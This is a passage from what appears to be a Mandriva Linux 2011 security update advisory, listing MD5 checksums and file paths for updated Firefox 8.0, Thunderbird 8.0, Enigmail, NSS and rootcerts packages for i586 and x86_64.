6bf97b86fd968c07856546e337d011ba 2011/i586/firefox-nso-8.0-0.1-mdv2011.0.noarch.rpm
2764c80c6f1966305e009b23b42face8 2011/i586/firefox-or-8.0-0.1-mdv2011.0.noarch.rpm
6ff4698899c4bf84e573f69eb0974964 2011/i586/firefox-pa_IN-8.0-0.1-mdv2011.0.noarch.rpm
6bb3f9b30415ae5e9fcd8f45c1539e0f 2011/i586/firefox-pl-8.0-0.1-mdv2011.0.noarch.rpm
fbd3fc580483c68502ce66f3f12a02dc 2011/i586/firefox-pt_BR-8.0-0.1-mdv2011.0.noarch.rpm
d3be732ffe2b0cce59f50e6e7b340fd8 2011/i586/firefox-pt_PT-8.0-0.1-mdv2011.0.noarch.rpm
567f88221cd9fde330a3232c50566cb9 2011/i586/firefox-ro-8.0-0.1-mdv2011.0.noarch.rpm
55051ce462a66bef47aff4a3665afd70 2011/i586/firefox-ru-8.0-0.1-mdv2011.0.noarch.rpm
95cb53acf56e0f00cadaf875f331a851 2011/i586/firefox-si-8.0-0.1-mdv2011.0.noarch.rpm
b9f694dd7c05016832014bf930d8f000 2011/i586/firefox-sk-8.0-0.1-mdv2011.0.noarch.rpm
64ea44b32d5229fafe091723516f66fd 2011/i586/firefox-sl-8.0-0.1-mdv2011.0.noarch.rpm
816f86703e6959b5e2a62b85877e96cb 2011/i586/firefox-sq-8.0-0.1-mdv2011.0.noarch.rpm
56f107c6869172f883c63eddccb8e474 2011/i586/firefox-sr-8.0-0.1-mdv2011.0.noarch.rpm
b0adb721bea75f7e3706e51f64ad72e6 2011/i586/firefox-sv_SE-8.0-0.1-mdv2011.0.noarch.rpm
5cdc462a21f6b4184ef9a3cc45420374 2011/i586/firefox-ta-8.0-0.1-mdv2011.0.noarch.rpm
ac596b16ef40dc7ae3ba6f2ac8f64a52 2011/i586/firefox-te-8.0-0.1-mdv2011.0.noarch.rpm
2fbed92c833003227c4e014f71e8b937 2011/i586/firefox-th-8.0-0.1-mdv2011.0.noarch.rpm
1c0000d057d0e582df51520af20ee300 2011/i586/firefox-tr-8.0-0.1-mdv2011.0.noarch.rpm
9aebe1c89781578d319a98f284470b9f 2011/i586/firefox-uk-8.0-0.1-mdv2011.0.noarch.rpm
a81492afff350f0e89284c4c972ff75b 2011/i586/firefox-vi-8.0-0.1-mdv2011.0.noarch.rpm
80393d7d792031b8ef05656cf4516986 2011/i586/firefox-zh_CN-8.0-0.1-mdv2011.0.noarch.rpm
9054368ddc7d602c8027211a5b44822c 2011/i586/firefox-zh_TW-8.0-0.1-mdv2011.0.noarch.rpm
0b19233abdee02c2de1f944d4214e435 2011/i586/firefox-zu-8.0-0.1-mdv2011.0.noarch.rpm
ed5e22d380d4b301b97ecfa72a142d75 2011/i586/libnss3-3.13.1-0.1-mdv2011.0.i586.rpm
9fd8d432e562d2b3bef292293353b418 2011/i586/libnss-devel-3.13.1-0.1-mdv2011.0.i586.rpm
3ddfe6b14caee66aea706d4829b4d844 2011/i586/libnss-static-devel-3.13.1-0.1-mdv2011.0.i586.rpm
4124513033da12e180312d44b54dd99d 2011/i586/mozilla-thunderbird-8.0-0.1-mdv2011.0.i586.rpm
c52a17f507e4710a2750878fbb1f0377 2011/i586/mozilla-thunderbird-ar-8.0-0.1-mdv2011.0.noarch.rpm
f5621a3bc9f83e07e51fd261838dda19 2011/i586/mozilla-thunderbird-ca-8.0-0.1-mdv2011.0.noarch.rpm
b85fc822ad496b64211ac7260d527c8b 2011/i586/mozilla-thunderbird-cs-8.0-0.1-mdv2011.0.noarch.rpm
c2e6c1ead82fa24473f4bdc0377d94d6 2011/i586/mozilla-thunderbird-da-8.0-0.1-mdv2011.0.noarch.rpm
b75ada47ea6e97a7d145d0c97a8e4392 2011/i586/mozilla-thunderbird-de-8.0-0.1-mdv2011.0.noarch.rpm
f208fef9e67a88aa74880a7e77502937 2011/i586/mozilla-thunderbird-en_GB-8.0-0.1-mdv2011.0.noarch.rpm
ef7c93da9c95f79dfc9fe4ad3ac9a4cb 2011/i586/mozilla-thunderbird-enigmail-8.0-0.1-mdv2011.0.i586.rpm
108df051af380a48d2e8df98863493d5 2011/i586/mozilla-thunderbird-enigmail-ar-8.0-0.1-mdv2011.0.noarch.rpm
1039b597406715508ad0c8c937f67e99 2011/i586/mozilla-thunderbird-enigmail-ca-8.0-0.1-mdv2011.0.noarch.rpm
380dce304e2714cbf79ed2c3d52f5c01 2011/i586/mozilla-thunderbird-enigmail-cs-8.0-0.1-mdv2011.0.noarch.rpm
89e34e30f600e75eea5cd1060d12b212 2011/i586/mozilla-thunderbird-enigmail-de-8.0-0.1-mdv2011.0.noarch.rpm
74126e8fca60aa389b8ccb42b1f46c4c 2011/i586/mozilla-thunderbird-enigmail-el-8.0-0.1-mdv2011.0.noarch.rpm
3d353d20404163092c4428f0e7a8d3ad 2011/i586/mozilla-thunderbird-enigmail-es-8.0-0.1-mdv2011.0.noarch.rpm
3e152640f0204e6e2e9eb10c9a6e54c6 2011/i586/mozilla-thunderbird-enigmail-fi-8.0-0.1-mdv2011.0.noarch.rpm
dc96684698bf9e9047f8ea65ec8343ae 2011/i586/mozilla-thunderbird-enigmail-fr-8.0-0.1-mdv2011.0.noarch.rpm
92e98da2be91b1c30510b48f06b153a2 2011/i586/mozilla-thunderbird-enigmail-it-8.0-0.1-mdv2011.0.noarch.rpm
905c4289fa7656172797022423a9f215 2011/i586/mozilla-thunderbird-enigmail-ja-8.0-0.1-mdv2011.0.noarch.rpm
166adcca3d0a9f84b1a1e70e7b1460b8 2011/i586/mozilla-thunderbird-enigmail-ko-8.0-0.1-mdv2011.0.noarch.rpm
78b836d3ae964a13f24d1e630c0b7381 2011/i586/mozilla-thunderbird-enigmail-nb-8.0-0.1-mdv2011.0.noarch.rpm
e3520c4f5ebc4d3d9281fefbe5800e72 2011/i586/mozilla-thunderbird-enigmail-nl-8.0-0.1-mdv2011.0.noarch.rpm
b8a5505caa14cc06ea4342107675808b 2011/i586/mozilla-thunderbird-enigmail-pl-8.0-0.1-mdv2011.0.noarch.rpm
17869ca918053d0a25cbcf651736b6e1 2011/i586/mozilla-thunderbird-enigmail-pt-8.0-0.1-mdv2011.0.noarch.rpm
e130f398262bd20dd81643ebaf1f64a1 2011/i586/mozilla-thunderbird-enigmail-pt_BR-8.0-0.1-mdv2011.0.noarch.rpm
7dfa6b18fdccdc7b67b43b4bd135ed5f 2011/i586/mozilla-thunderbird-enigmail-ru-8.0-0.1-mdv2011.0.noarch.rpm
3dbc6fee3da392b1f8fba2bba12d4b91 2011/i586/mozilla-thunderbird-enigmail-sl-8.0-0.1-mdv2011.0.noarch.rpm
45a16b99cbcff9a3fd05a7d59be39b13 2011/i586/mozilla-thunderbird-enigmail-sv-8.0-0.1-mdv2011.0.noarch.rpm
73dee4d84788f43e4860ec7512e57864 2011/i586/mozilla-thunderbird-enigmail-tr-8.0-0.1-mdv2011.0.noarch.rpm
414ea8cc227fc2dd23a300cab9e12a70 2011/i586/mozilla-thunderbird-enigmail-vi-8.0-0.1-mdv2011.0.noarch.rpm
bff778cad5848fca7abf8d04f8bad12f 2011/i586/mozilla-thunderbird-enigmail-zh_CN-8.0-0.1-mdv2011.0.noarch.rpm
0c4cc29f52a0dbefdab5248c589a6ec8 2011/i586/mozilla-thunderbird-enigmail-zh_TW-8.0-0.1-mdv2011.0.noarch.rpm
9265906199416216eafc67bc0b4e373b 2011/i586/mozilla-thunderbird-es_AR-8.0-0.1-mdv2011.0.noarch.rpm
6011db155ae4593e95c8a0783096ec49 2011/i586/mozilla-thunderbird-es_ES-8.0-0.1-mdv2011.0.noarch.rpm
f8bec71c99dc152bce772cf9554fff1d 2011/i586/mozilla-thunderbird-et-8.0-0.1-mdv2011.0.noarch.rpm
90787990d984a8fc939ad628996d5a8d 2011/i586/mozilla-thunderbird-eu-8.0-0.1-mdv2011.0.noarch.rpm
d1691cdd824a020c8092c6ae8a857276 2011/i586/mozilla-thunderbird-fi-8.0-0.1-mdv2011.0.noarch.rpm
0aa2df2c72eeef8edf2e064a4dc560aa 2011/i586/mozilla-thunderbird-fr-8.0-0.1-mdv2011.0.noarch.rpm
d104dcd5f829b4af2feb905a94196a8d 2011/i586/mozilla-thunderbird-fy-8.0-0.1-mdv2011.0.noarch.rpm
bbf6dc8b2f027a8cd537cec0510d07b4 2011/i586/mozilla-thunderbird-ga-8.0-0.1-mdv2011.0.noarch.rpm
621f429aaf6e902638bd1298395bf5be 2011/i586/mozilla-thunderbird-gd-8.0-0.1-mdv2011.0.noarch.rpm
4c0f5ebbd4b9b3b7a71f3cc2a0c800c5 2011/i586/mozilla-thunderbird-gl-8.0-0.1-mdv2011.0.noarch.rpm
13eab4a35dfcff45c9a979e1689b19ff 2011/i586/mozilla-thunderbird-he-8.0-0.1-mdv2011.0.noarch.rpm
7b3906227b78445572ef9e0f9a0079e9 2011/i586/mozilla-thunderbird-hu-8.0-0.1-mdv2011.0.noarch.rpm
08eccce392d64cbf759c20a1b5b67e5a 2011/i586/mozilla-thunderbird-is-8.0-0.1-mdv2011.0.noarch.rpm
8777d9a254756a1a6a9e279e788d96ef 2011/i586/mozilla-thunderbird-it-8.0-0.1-mdv2011.0.noarch.rpm
f5ac1ac494d2cceff2c6836456c7b4ac 2011/i586/mozilla-thunderbird-ja-8.0-0.1-mdv2011.0.noarch.rpm
9a927fbfaef8959b9ecd5c8f364c73a0 2011/i586/mozilla-thunderbird-ko-8.0-0.1-mdv2011.0.noarch.rpm
bd248a7ed643c28a7759e0621b5701b9 2011/i586/mozilla-thunderbird-lightning-8.0-0.1-mdv2011.0.i586.rpm
59d3d848d95ea6767e1222b65c2fee0e 2011/i586/mozilla-thunderbird-lt-8.0-0.1-mdv2011.0.noarch.rpm
017b98043619f7ec1dd741a79b83fb4a 2011/i586/mozilla-thunderbird-nb_NO-8.0-0.1-mdv2011.0.noarch.rpm
8df528e1dde5b44cb681257635b16bec 2011/i586/mozilla-thunderbird-nl-8.0-0.1-mdv2011.0.noarch.rpm
7369a9f0ba8924ee98e845cf3f23cd47 2011/i586/mozilla-thunderbird-nn_NO-8.0-0.1-mdv2011.0.noarch.rpm
49be8212d41d6d881d4c5740545809a3 2011/i586/mozilla-thunderbird-pl-8.0-0.1-mdv2011.0.noarch.rpm
fa9fe184c56b76d7291a665807016da6 2011/i586/mozilla-thunderbird-pt_BR-8.0-0.1-mdv2011.0.noarch.rpm
bc43ca4e08fe6d664ef2eafc85b402a6 2011/i586/mozilla-thunderbird-pt_PT-8.0-0.1-mdv2011.0.noarch.rpm
b8946d1caea088a9ea4c2d5d1011c3c6 2011/i586/mozilla-thunderbird-ru-8.0-0.1-mdv2011.0.noarch.rpm
eff365e7080776614457752adcdf353e 2011/i586/mozilla-thunderbird-si-8.0-0.1-mdv2011.0.noarch.rpm
d7990533fb2bbb1f0a0a9777d81c3b82 2011/i586/mozilla-thunderbird-sk-8.0-0.1-mdv2011.0.noarch.rpm
c1781992e1110266f5eb62055e596b8c 2011/i586/mozilla-thunderbird-sl-8.0-0.1-mdv2011.0.noarch.rpm
e072107da1de50bc0148191903359f57 2011/i586/mozilla-thunderbird-sq-8.0-0.1-mdv2011.0.noarch.rpm
668807c192bbe9b7fd75a06b81cfb419 2011/i586/mozilla-thunderbird-sv_SE-8.0-0.1-mdv2011.0.noarch.rpm
2d7489a606232c663c2c0b32560e65e5 2011/i586/mozilla-thunderbird-tr-8.0-0.1-mdv2011.0.noarch.rpm
00128458d573f52d66f96d874d22c0c9 2011/i586/mozilla-thunderbird-uk-8.0-0.1-mdv2011.0.noarch.rpm
187a13b4f8cd8e4b26ce6f7531d80ef1 2011/i586/mozilla-thunderbird-zh_TW-8.0-0.1-mdv2011.0.noarch.rpm
25932cce76eb4736b64a36c5d9f2b354 2011/i586/nsinstall-8.0-0.1-mdv2011.0.i586.rpm
d00456715526a1d96b2456201ed8c853 2011/i586/nss-3.13.1-0.1-mdv2011.0.i586.rpm
e9660b780dcfab6f8179a201955834ea 2011/i586/rootcerts-20111103.00-1-mdv2011.0.i586.rpm
da113b9c9d8540dc3d15b51414183247 2011/i586/rootcerts-java-20111103.00-1-mdv2011.0.i586.rpm
61bcb0f8fa18f7f4c07932829b6e47d4 2011/SRPMS/firefox-8.0-0.1.src.rpm
7d248eb9b27542d4f24a360d69798d36 2011/SRPMS/firefox-l10n-8.0-0.1.src.rpm
a96945e087712c9c72217abd42917dd5 2011/SRPMS/mozilla-thunderbird-8.0-0.1.src.rpm
a0d367a7922e9fb3472c8f3cf3f588c2 2011/SRPMS/mozilla-thunderbird-l10n-8.0-0.1.src.rpm
caebadfb72c1efd8c1c96921f6127dc5 2011/SRPMS/nss-3.13.1-0.1.src.rpm
3b77fd446a76fffc6268138dc69eff2d 2011/SRPMS/rootcerts-20111103.00-1.src.rpm
Mandriva Linux 2011/X86_64:
643838c004763a1ef07f5bd434b9038c 2011/x86_64/firefox-8.0-0.1-mdv2011.0.x86_64.rpm
6e8e9bd32b6d34648117c1d15f591bf0 2011/x86_64/firefox-af-8.0-0.1-mdv2011.0.noarch.rpm
e50ecf25f45bbeb8b789f3d2ca2285ac 2011/x86_64/firefox-ar-8.0-0.1-mdv2011.0.noarch.rpm
754d2098c423988f6f90030b38c14032 2011/x86_64/firefox-ast-8.0-0.1-mdv2011.0.noarch.rpm
0147b0f068d4105a4b64a5a0990e0a94 2011/x86_64/firefox-be-8.0-0.1-mdv2011.0.noarch.rpm
beba968d6ca7d89ea49fa301074065eb 2011/x86_64/firefox-bg-8.0-0.1-mdv2011.0.noarch.rpm
d63ae3391ce75ab46f0262f9be5b7d0b 2011/x86_64/firefox-bn-8.0-0.1-mdv2011.0.noarch.rpm
f9c05c054072cc70b9114e3fb201c330 2011/x86_64/firefox-br-8.0-0.1-mdv2011.0.noarch.rpm
39dbd7da0e80c611272c433a3a97932b 2011/x86_64/firefox-bs-8.0-0.1-mdv2011.0.noarch.rpm
fd80ccbba0db618504cf598890887a26 2011/x86_64/firefox-ca-8.0-0.1-mdv2011.0.noarch.rpm
fb189b616694dd4b67d1c1bd43f712b5 2011/x86_64/firefox-cs-8.0-0.1-mdv2011.0.noarch.rpm
d5dc1642b37f70496963a677df9a7569 2011/x86_64/firefox-cy-8.0-0.1-mdv2011.0.noarch.rpm
45138c219e3c24c94c855990a50b58a7 2011/x86_64/firefox-da-8.0-0.1-mdv2011.0.noarch.rpm
5a3885d5ea90a02a70c05ad8945bfcdd 2011/x86_64/firefox-de-8.0-0.1-mdv2011.0.noarch.rpm
e1bf09086a155ef5daf92c625a3dc525 2011/x86_64/firefox-devel-8.0-0.1-mdv2011.0.x86_64.rpm
d2af4710559602a38c758cf1353ed127 2011/x86_64/firefox-el-8.0-0.1-mdv2011.0.noarch.rpm
6022e8e4601f693a4ab1c9c40256078c 2011/x86_64/firefox-en_GB-8.0-0.1-mdv2011.0.noarch.rpm
fcf5f2c4c6b9a6b7a0e6530eb0f38285 2011/x86_64/firefox-eo-8.0-0.1-mdv2011.0.noarch.rpm
59cc66d99e5dede53120b0ac114c2aec 2011/x86_64/firefox-es_AR-8.0-0.1-mdv2011.0.noarch.rpm
3a4d2ce94f50a3199bc21d8a2b00ec02 2011/x86_64/firefox-es_ES-8.0-0.1-mdv2011.0.noarch.rpm
6ef157f12909e774736fd5da36ebb9f6 2011/x86_64/firefox-et-8.0-0.1-mdv2011.0.noarch.rpm
2ed905d87d5d880161b008b3f22d56de 2011/x86_64/firefox-eu-8.0-0.1-mdv2011.0.noarch.rpm
3b6f46877d298ee1e177645b443cd640 2011/x86_64/firefox-fa-8.0-0.1-mdv2011.0.noarch.rpm
b6096677a473b9105c3f4b1e49180bbf 2011/x86_64/firefox-fi-8.0-0.1-mdv2011.0.noarch.rpm
21a15ec09bff29b9d20b9a2af73d2f72 2011/x86_64/firefox-fr-8.0-0.1-mdv2011.0.noarch.rpm
350bbd2f8118baf4819bf5bbf0fbae2d 2011/x86_64/firefox-fy-8.0-0.1-mdv2011.0.noarch.rpm
6e2ef5e8e8bff5e5b4668d280f937138 2011/x86_64/firefox-ga_IE-8.0-0.1-mdv2011.0.noarch.rpm
058c8c99b3b4c20856de64412bad8664 2011/x86_64/firefox-gd-8.0-0.1-mdv2011.0.noarch.rpm
f57be635571496863c7f5d3d92e0abd8 2011/x86_64/firefox-gl-8.0-0.1-mdv2011.0.noarch.rpm
70c264ccd53d8d14c81f13fa5cefee7b 2011/x86_64/firefox-gu_IN-8.0-0.1-mdv2011.0.noarch.rpm
c54911434ea0177a8a60b5a6457c2d37 2011/x86_64/firefox-he-8.0-0.1-mdv2011.0.noarch.rpm
009d1cd70a0f75f5fbc1d64122d57510 2011/x86_64/firefox-hi-8.0-0.1-mdv2011.0.noarch.rpm
6db5bbeaf0c115414f59654fc17f03cf 2011/x86_64/firefox-hr-8.0-0.1-mdv2011.0.noarch.rpm
c6b0530aea0f6f44cf64775e78e29c67 2011/x86_64/firefox-hu-8.0-0.1-mdv2011.0.noarch.rpm
69dc0e6bdb402f5357394665768c3b18 2011/x86_64/firefox-hy-8.0-0.1-mdv2011.0.noarch.rpm
a0771908862baa3dbc3ada2c2fd42933 2011/x86_64/firefox-id-8.0-0.1-mdv2011.0.noarch.rpm
b79ff32c11665be96d40d5805180969e 2011/x86_64/firefox-is-8.0-0.1-mdv2011.0.noarch.rpm
0ef76afc9d272c57b0717454f62e384e 2011/x86_64/firefox-it-8.0-0.1-mdv2011.0.noarch.rpm
8a599fa70e5760f0a5199342e76ec285 2011/x86_64/firefox-ja-8.0-0.1-mdv2011.0.noarch.rpm
7a07df38588757a55ee628bfa677a070 2011/x86_64/firefox-kk-8.0-0.1-mdv2011.0.noarch.rpm
56f41cb6024c3a6dad78e319717895e5 2011/x86_64/firefox-kn-8.0-0.1-mdv2011.0.noarch.rpm
4b90145f15e269466856e57e1119600c 2011/x86_64/firefox-ko-8.0-0.1-mdv2011.0.noarch.rpm
20c614a22a90aa5e1a276c7a29045593 2011/x86_64/firefox-ku-8.0-0.1-mdv2011.0.noarch.rpm
d3e3abf04dc908ed55773a724878d79d 2011/x86_64/firefox-lg-8.0-0.1-mdv2011.0.noarch.rpm
ef006acf1af52b4ffe0822d192e6e846 2011/x86_64/firefox-lt-8.0-0.1-mdv2011.0.noarch.rpm
30484d81df2067a01491cc240dcfdfb9 2011/x86_64/firefox-lv-8.0-0.1-mdv2011.0.noarch.rpm
79a62a2e5fd008dc55616d47cacdf1b5 2011/x86_64/firefox-mai-8.0-0.1-mdv2011.0.noarch.rpm
e0e97bd0a4076336a65f693d04b8beb1 2011/x86_64/firefox-mk-8.0-0.1-mdv2011.0.noarch.rpm
59a5fcd30a2a43916634258e509583f5 2011/x86_64/firefox-ml-8.0-0.1-mdv2011.0.noarch.rpm
d4eef09f3e5c6b5a0f6dda8384f23e17 2011/x86_64/firefox-mr-8.0-0.1-mdv2011.0.noarch.rpm
0b5e0e532c79a4134d164acd9bee711b 2011/x86_64/firefox-nb_NO-8.0-0.1-mdv2011.0.noarch.rpm
c2c1e6fe952084961966003104982e12 2011/x86_64/firefox-nl-8.0-0.1-mdv2011.0.noarch.rpm
ddac6c7e7a111d8c5bf780ab28289ea2 2011/x86_64/firefox-nn_NO-8.0-0.1-mdv2011.0.noarch.rpm
2333089a0bf704a0f9a304bcf8754458 2011/x86_64/firefox-nso-8.0-0.1-mdv2011.0.noarch.rpm
31030c7166977c0ced30149b0be9ec9c 2011/x86_64/firefox-or-8.0-0.1-mdv2011.0.noarch.rpm
0c7ee9dcc6c69ad6255a7e56fd59f679 2011/x86_64/firefox-pa_IN-8.0-0.1-mdv2011.0.noarch.rpm
cf8cfbe585b68d10b1ff66c982f33da7 2011/x86_64/firefox-pl-8.0-0.1-mdv2011.0.noarch.rpm
42e8e80d5199a1a811fba710b3489408 2011/x86_64/firefox-pt_BR-8.0-0.1-mdv2011.0.noarch.rpm
39507f66b460eb57b9dc4853b6a22855 2011/x86_64/firefox-pt_PT-8.0-0.1-mdv2011.0.noarch.rpm
df62176d571b4cf1a0dc2817508c973a 2011/x86_64/firefox-ro-8.0-0.1-mdv2011.0.noarch.rpm
d4bc13a9c746c518a078481ccd6dbdc2 2011/x86_64/firefox-ru-8.0-0.1-mdv2011.0.noarch.rpm
6bca05f2fd80bb68aa1197a54a577aa2 2011/x86_64/firefox-si-8.0-0.1-mdv2011.0.noarch.rpm
0965dc5334ac60921342d3a87e2748cb 2011/x86_64/firefox-sk-8.0-0.1-mdv2011.0.noarch.rpm
2eff4808be6d87b75d8b205ca4942615 2011/x86_64/firefox-sl-8.0-0.1-mdv2011.0.noarch.rpm
3cc5305c8eae7a87f255e9f3641a2cf5 2011/x86_64/firefox-sq-8.0-0.1-mdv2011.0.noarch.rpm
8e8cf12ab97269c26c655d5deec2b55b 2011/x86_64/firefox-sr-8.0-0.1-mdv2011.0.noarch.rpm
43bd40f3ce1fe250411d71b0ab6cf325 2011/x86_64/firefox-sv_SE-8.0-0.1-mdv2011.0.noarch.rpm
d86bcf5cb9ecfff6cde87a16219b9c00 2011/x86_64/firefox-ta-8.0-0.1-mdv2011.0.noarch.rpm
66be7f7b87c9366ce35b91498cdcdab9 2011/x86_64/firefox-te-8.0-0.1-mdv2011.0.noarch.rpm
8c60f0ca989199a2cfa8640f9f358f65 2011/x86_64/firefox-th-8.0-0.1-mdv2011.0.noarch.rpm
b874345b5acd79f7c0829f0fe513165e 2011/x86_64/firefox-tr-8.0-0.1-mdv2011.0.noarch.rpm
810a18307530a95d9eaa45af27370ca9 2011/x86_64/firefox-uk-8.0-0.1-mdv2011.0.noarch.rpm
6ce3b355c1132e0852decf6f4500bae5 2011/x86_64/firefox-vi-8.0-0.1-mdv2011.0.noarch.rpm
a729a527ca14cf885963d9b8792f6b53 2011/x86_64/firefox-zh_CN-8.0-0.1-mdv2011.0.noarch.rpm
af65452dc2697d8396f2971dc82dbfd3 2011/x86_64/firefox-zh_TW-8.0-0.1-mdv2011.0.noarch.rpm
e11e77050b0379945ace7e6b1bb18138 2011/x86_64/firefox-zu-8.0-0.1-mdv2011.0.noarch.rpm
65bcb7fb6e270d23de707938a99033cc 2011/x86_64/lib64nss3-3.13.1-0.1-mdv2011.0.x86_64.rpm
3977803c1ee1e6c59a791786ef474920 2011/x86_64/lib64nss-devel-3.13.1-0.1-mdv2011.0.x86_64.rpm
6f6083d61dbb9d66034acbf611a938a5 2011/x86_64/lib64nss-static-devel-3.13.1-0.1-mdv2011.0.x86_64.rpm
c4f41d0d43c4d7aa3332d4268aec0d75 2011/x86_64/mozilla-thunderbird-8.0-0.1-mdv2011.0.x86_64.rpm
ca130690c8c28d42f7f0b841b1fd3963 2011/x86_64/mozilla-thunderbird-ar-8.0-0.1-mdv2011.0.noarch.rpm
d49376356223bfcd1fbb21dd3a606955 2011/x86_64/mozilla-thunderbird-ca-8.0-0.1-mdv2011.0.noarch.rpm
dfd68aa158792676dcabb00c83ae2e74 2011/x86_64/mozilla-thunderbird-cs-8.0-0.1-mdv2011.0.noarch.rpm
19dca475cdb000bfc4beefaa82a22c4e 2011/x86_64/mozilla-thunderbird-da-8.0-0.1-mdv2011.0.noarch.rpm
008b70708910f6751c7a04395b5d3510 2011/x86_64/mozilla-thunderbird-de-8.0-0.1-mdv2011.0.noarch.rpm
d051f585ded92c46b57f8bc465cdb005 2011/x86_64/mozilla-thunderbird-en_GB-8.0-0.1-mdv2011.0.noarch.rpm
32e98b073ebd4995cf74889657eba4a0 2011/x86_64/mozilla-thunderbird-enigmail-8.0-0.1-mdv2011.0.x86_64.rpm
7b3fa7b4f8f3233d1c795081d558b0cf 2011/x86_64/mozilla-thunderbird-enigmail-ar-8.0-0.1-mdv2011.0.noarch.rpm
24d56f759a61c416099e7ae1017deeb5 2011/x86_64/mozilla-thunderbird-enigmail-ca-8.0-0.1-mdv2011.0.noarch.rpm
a7a768440f2e3b9ba50d54ffd407f221 2011/x86_64/mozilla-thunderbird-enigmail-cs-8.0-0.1-mdv2011.0.noarch.rpm
fce06178a86980c40d58dd8750533484 2011/x86_64/mozilla-thunderbird-enigmail-de-8.0-0.1-mdv2011.0.noarch.rpm
0cbe6313f9094e678ae5230729dcc3a0 2011/x86_64/mozilla-thunderbird-enigmail-el-8.0-0.1-mdv2011.0.noarch.rpm
ed15c618b6a7bd84b9fdb054f7097961 2011/x86_64/mozilla-thunderbird-enigmail-es-8.0-0.1-mdv2011.0.noarch.rpm
ca61468ec463edccbce0f9373b77fedd 2011/x86_64/mozilla-thunderbird-enigmail-fi-8.0-0.1-mdv2011.0.noarch.rpm
5141b8a2f4e0ee3e376a4fef39f99611 2011/x86_64/mozilla-thunderbird-enigmail-fr-8.0-0.1-mdv2011.0.noarch.rpm
500b33504a167b73349c46aca0c66f35 2011/x86_64/mozilla-thunderbird-enigmail-it-8.0-0.1-mdv2011.0.noarch.rpm
5767dae6f58853ff6e0971a4af9debe2 2011/x86_64/mozilla-thunderbird-enigmail-ja-8.0-0.1-mdv2011.0.noarch.rpm
a46373677297684234e71c5ab927ff1b 2011/x86_64/mozilla-thunderbird-enigmail-ko-8.0-0.1-mdv2011.0.noarch.rpm
a18f9c50c0668ac485d312b3b7e151cf 2011/x86_64/mozilla-thunderbird-enigmail-nb-8.0-0.1-mdv2011.0.noarch.rpm
a3cdbd049f17e1c2d717056980cfdb74 2011/x86_64/mozilla-thunderbird-enigmail-nl-8.0-0.1-mdv2011.0.noarch.rpm
7669904111413ac731c72eb18d563768 2011/x86_64/mozilla-thunderbird-enigmail-pl-8.0-0.1-mdv2011.0.noarch.rpm
a01f66aac1cf48593b81d9c20454457a 2011/x86_64/mozilla-thunderbird-enigmail-pt-8.0-0.1-mdv2011.0.noarch.rpm
0ccc42ccb92a4b68140e81abaa66490c 2011/x86_64/mozilla-thunderbird-enigmail-pt_BR-8.0-0.1-mdv2011.0.noarch.rpm
1c1c9596be5522c49ae75449ebed69dc 2011/x86_64/mozilla-thunderbird-enigmail-ru-8.0-0.1-mdv2011.0.noarch.rpm
effedb330e51cc2385afc3823480c5e3 2011/x86_64/mozilla-thunderbird-enigmail-sl-8.0-0.1-mdv2011.0.noarch.rpm
4aa467aac374b324300aa3d8f210f331 2011/x86_64/mozilla-thunderbird-enigmail-sv-8.0-0.1-mdv2011.0.noarch.rpm
073742dac4e03f430c6a33394ded00ad 2011/x86_64/mozilla-thunderbird-enigmail-tr-8.0-0.1-mdv2011.0.noarch.rpm
d02df2cc107c5df2275a977dcf0dc29b 2011/x86_64/mozilla-thunderbird-enigmail-vi-8.0-0.1-mdv2011.0.noarch.rpm
b18afe8f18afa07f830eb25cea32145b 2011/x86_64/mozilla-thunderbird-enigmail-zh_CN-8.0-0.1-mdv2011.0.noarch.rpm
755f0ddd7efe9315c76301d2c8c93259 2011/x86_64/mozilla-thunderbird-enigmail-zh_TW-8.0-0.1-mdv2011.0.noarch.rpm
fafd3a27cde58e69eb773d2750961307 2011/x86_64/mozilla-thunderbird-es_AR-8.0-0.1-mdv2011.0.noarch.rpm
68b62afef7ab3216380608357f062948 2011/x86_64/mozilla-thunderbird-es_ES-8.0-0.1-mdv2011.0.noarch.rpm
66d411dcce020625098448fbe729b792 2011/x86_64/mozilla-thunderbird-et-8.0-0.1-mdv2011.0.noarch.rpm
fd799617dad070b50176687c21aced97 2011/x86_64/mozilla-thunderbird-eu-8.0-0.1-mdv2011.0.noarch.rpm
be59206b07302cc816942506bda105f0 2011/x86_64/mozilla-thunderbird-fi-8.0-0.1-mdv2011.0.noarch.rpm
66dbc83361857900d776aa6304ac07a7 2011/x86_64/mozilla-thunderbird-fr-8.0-0.1-mdv2011.0.noarch.rpm
66b7c8dbb412dd17ce846cee306c92de 2011/x86_64/mozilla-thunderbird-fy-8.0-0.1-mdv2011.0.noarch.rpm
7195ab0093ac1f71c05fcda7ad4781d2 2011/x86_64/mozilla-thunderbird-ga-8.0-0.1-mdv2011.0.noarch.rpm
ff778ffc4a6f7729ed15afdd08c68d94 2011/x86_64/mozilla-thunderbird-gd-8.0-0.1-mdv2011.0.noarch.rpm
2a878f5684c0fdfcfe93f66e28bc67bc 2011/x86_64/mozilla-thunderbird-gl-8.0-0.1-mdv2011.0.noarch.rpm
2ec5191b2058fcd43d99f3a9e10de775 2011/x86_64/mozilla-thunderbird-he-8.0-0.1-mdv2011.0.noarch.rpm
0dd03f63f176485e733e2d534a35eeaf 2011/x86_64/mozilla-thunderbird-hu-8.0-0.1-mdv2011.0.noarch.rpm
1f07523e4b28b6afec9a023329f804e2 2011/x86_64/mozilla-thunderbird-is-8.0-0.1-mdv2011.0.noarch.rpm
2526cd578a813395d2eb8531bee8a3d0 2011/x86_64/mozilla-thunderbird-it-8.0-0.1-mdv2011.0.noarch.rpm
e83886eb5f4190b1fa3a5a558b5fb4a9 2011/x86_64/mozilla-thunderbird-ja-8.0-0.1-mdv2011.0.noarch.rpm
eaabd1a6ad0868ca5d5c6267f0d53637 2011/x86_64/mozilla-thunderbird-ko-8.0-0.1-mdv2011.0.noarch.rpm
abc259d09f87df6f8c42c4da41c08874 2011/x86_64/mozilla-thunderbird-lightning-8.0-0.1-mdv2011.0.x86_64.rpm
fdbb8e69e1e3177cfde0314eb353ea23 2011/x86_64/mozilla-thunderbird-lt-8.0-0.1-mdv2011.0.noarch.rpm
a9979701636fb273b6a6a0e2fc2bdce2 2011/x86_64/mozilla-thunderbird-nb_NO-8.0-0.1-mdv2011.0.noarch.rpm
6c135884107ef8064b9597a7f1b83e39 2011/x86_64/mozilla-thunderbird-nl-8.0-0.1-mdv2011.0.noarch.rpm
d4268187c501b1c3e8dc7a90b7a2b464 2011/x86_64/mozilla-thunderbird-nn_NO-8.0-0.1-mdv2011.0.noarch.rpm
